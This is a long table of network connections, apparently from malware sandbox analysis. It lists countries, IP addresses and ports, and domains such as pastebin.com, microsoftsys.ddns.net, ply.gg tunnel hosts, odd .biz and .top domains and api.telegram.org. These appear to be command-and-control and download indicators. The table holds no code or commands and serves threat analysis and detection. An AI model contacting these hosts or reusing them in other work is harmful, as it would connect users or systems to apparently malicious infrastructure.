| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 46.235.26.83:8080 | tcp | |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 66.45.226.53:7777 | tcp | |
| DE | 3.70.228.168:555 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 66.45.226.53:7777 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 147.185.221.17:39017 | profile-indians.gl.at.ply.gg | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 73.62.14.5:4782 | tcp | |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 185.81.68.156:80 | 185.81.68.156 | tcp |
| US | 66.45.226.53:7777 | tcp | |
| HK | 117.18.7.76:3782 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 147.28.185.29:80 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| VN | 14.243.221.170:3322 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 3.70.228.168:555 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 66.45.226.53:7777 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:80 | github.com | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| NL | 206.166.251.4:8080 | tcp | |
| US | 147.185.221.17:39017 | profile-indians.gl.at.ply.gg | tcp |
| US | 66.45.226.53:7777 | tcp | |
| US | 73.62.14.5:4782 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| GB | 89.197.154.116:80 | 89.197.154.116 | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| TR | 94.156.177.155:80 | 94.156.177.155 | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| GB | 89.197.154.116:7810 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| HK | 117.18.7.76:3782 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 66.45.226.53:7777 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| CN | 8.134.163.72:801 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 8.8.8.8:53 | covery-mover.biz | udp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| VN | 14.243.221.170:3322 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 3.70.228.168:555 | tcp | |
| KR | 152.67.212.187:443 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| FR | 51.159.4.50:8080 | tcp | |
| US | 66.45.226.53:7777 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:5552 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 73.62.14.5:4782 | tcp | |
| N/A | 127.0.0.1:5552 | tcp | |
| N/A | 127.0.0.1:1504 | tcp | |
| VE | 167.250.49.155:80 | 167.250.49.155 | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 66.45.226.53:7777 | tcp | |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 147.185.221.17:39017 | profile-indians.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | safe.ywxww.net | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:5552 | tcp | |
| CN | 60.191.236.246:820 | safe.ywxww.net | tcp |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| HK | 117.18.7.76:3782 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | late-lil.at.ply.gg | udp |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| NL | 89.110.69.103:80 | 89.110.69.103 | tcp |
| US | 66.45.226.53:7777 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:5552 | tcp | |
| N/A | 127.0.0.1:1504 | tcp | |
| N/A | 127.0.0.1:5552 | tcp | |
| VN | 14.243.221.170:3322 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 167.235.70.96:8080 | tcp | |
| DE | 3.70.228.168:555 | tcp | |
| RU | 185.81.68.156:80 | 185.81.68.156 | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:5552 | tcp | |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 66.45.226.53:7777 | tcp | |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:5552 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 73.62.14.5:4782 | tcp | |
| US | 104.21.16.1:80 | downsexv.com | tcp |
| N/A | 127.0.0.1:5552 | tcp | |
| N/A | 127.0.0.1:1504 | tcp | |
| CN | 103.24.179.18:7004 | tcp | |
| US | 104.21.16.1:8080 | downsexv.com | tcp |
| US | 66.45.226.53:7777 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 147.185.221.17:39017 | profile-indians.gl.at.ply.gg | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:5552 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| HK | 117.18.7.76:3782 | tcp | |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:5552 | tcp | |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| DE | 185.218.125.157:21441 | tcp | |
| KR | 152.67.212.187:443 | tcp | |
| US | 66.45.226.53:7777 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 194.164.198.113:8080 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:5552 | tcp | |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 3.70.228.168:555 | tcp | |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| VN | 14.243.221.170:3322 | tcp | |
| N/A | 127.0.0.1:5552 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 66.45.226.53:7777 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:5552 | tcp | |
| US | 73.62.14.5:4782 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 66.45.226.53:7777 | tcp | |
| N/A | 127.0.0.1:5552 | tcp | |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| HK | 117.18.7.76:3782 | tcp | |
| IT | 185.225.73.67:1050 | tcp | |
| US | 98.51.190.130:20 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| GB | 132.145.17.167:9090 | 132.145.17.167 | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 147.185.221.17:39017 | profile-indians.gl.at.ply.gg | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 66.45.226.53:7777 | tcp | |
| FR | 91.134.82.79:443 | i.ibb.co | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| DE | 3.70.228.168:555 | tcp | |
| DE | 209.38.221.184:8080 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| VN | 14.243.221.170:3322 | tcp | |
| US | 98.51.190.130:20 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:5552 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 66.45.226.53:7777 | tcp | |
| DE | 46.235.26.83:8080 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 73.62.14.5:4782 | tcp | |
| US | 98.51.190.130:20 | tcp | |
| RU | 185.81.68.156:80 | 185.81.68.156 | tcp |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| IT | 185.225.73.67:1050 | tcp | |
| US | 66.45.226.53:7777 | tcp | |
| HK | 117.18.7.76:3782 | tcp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| KR | 152.67.212.187:443 | tcp | |
| US | 66.45.226.53:7777 | tcp | |
| DE | 3.70.228.168:555 | tcp | |
| US | 8.8.8.8:53 | profile-indians.gl.at.ply.gg | udp |
| US | 147.185.221.17:39017 | profile-indians.gl.at.ply.gg | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 98.51.190.130:20 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| VN | 14.243.221.170:3322 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 147.28.185.29:80 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 73.62.14.5:4782 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 66.45.226.53:7777 | tcp | |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| IT | 185.225.73.67:1050 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| NL | 206.166.251.4:8080 | tcp | |
| US | 98.51.190.130:20 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| HK | 117.18.7.76:3782 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | download.skycn.com | udp |
| US | 66.45.226.53:7777 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| CN | 116.114.98.35:80 | download.skycn.com | tcp |
| N/A | 192.168.56.1:4782 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 98.51.190.130:20 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| DE | 3.70.228.168:555 | tcp | |
| US | 66.45.226.53:7777 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 147.185.221.17:39017 | profile-indians.gl.at.ply.gg | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 98.51.190.130:20 | tcp | |
| VN | 14.243.221.170:3322 | tcp | |
| IT | 185.225.73.67:1050 | tcp | |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| US | 73.62.14.5:4782 | tcp | |
| FR | 51.159.4.50:8080 | tcp | |
| US | 66.45.226.53:7777 | tcp | |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| HK | 117.18.7.76:3782 | tcp | |
| US | 66.45.226.53:7777 | tcp | |
| N/A | 192.168.56.1:4782 | tcp | |
| N/A | 127.0.0.1:1504 | tcp | |
| TR | 94.156.177.33:80 | tcp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 185.81.68.156:80 | 185.81.68.156 | tcp |
| DE | 3.70.228.168:555 | tcp | |
| US | 98.51.190.130:20 | tcp | |
| US | 66.45.226.53:7777 | tcp | |
| N/A | 127.0.0.1:5552 | tcp | |
| US | 147.185.221.17:39017 | profile-indians.gl.at.ply.gg | tcp |
| IT | 185.225.73.67:1050 | tcp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| DE | 167.235.70.96:8080 | tcp | |
| VN | 14.243.221.170:3322 | tcp | |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| US | 73.62.14.5:4782 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 66.45.226.53:7777 | tcp | |
| HK | 117.18.7.76:3782 | tcp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| TR | 94.156.177.33:80 | tcp | |
| KR | 152.67.212.187:443 | tcp | |
| N/A | 192.168.56.1:4782 | tcp | |
| US | 66.45.226.53:7777 | tcp | |
| US | 98.51.190.130:20 | tcp | |
| DE | 3.70.228.168:555 | tcp | |
| N/A | 127.0.0.1:5552 | tcp | |
| US | 66.45.226.53:7777 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| IT | 185.225.73.67:1050 | tcp | |
| DE | 194.164.198.113:8080 | tcp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| VN | 14.243.221.170:3322 | tcp | |
| US | 73.62.14.5:4782 | tcp | |
| US | 147.185.221.17:39017 | profile-indians.gl.at.ply.gg | tcp |
| US | 98.51.190.130:20 | tcp | |
| US | 66.45.226.53:7777 | tcp | |
| HK | 117.18.7.76:3782 | tcp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| N/A | 192.168.56.1:4782 | tcp | |
| US | 66.45.226.53:7777 | tcp | |
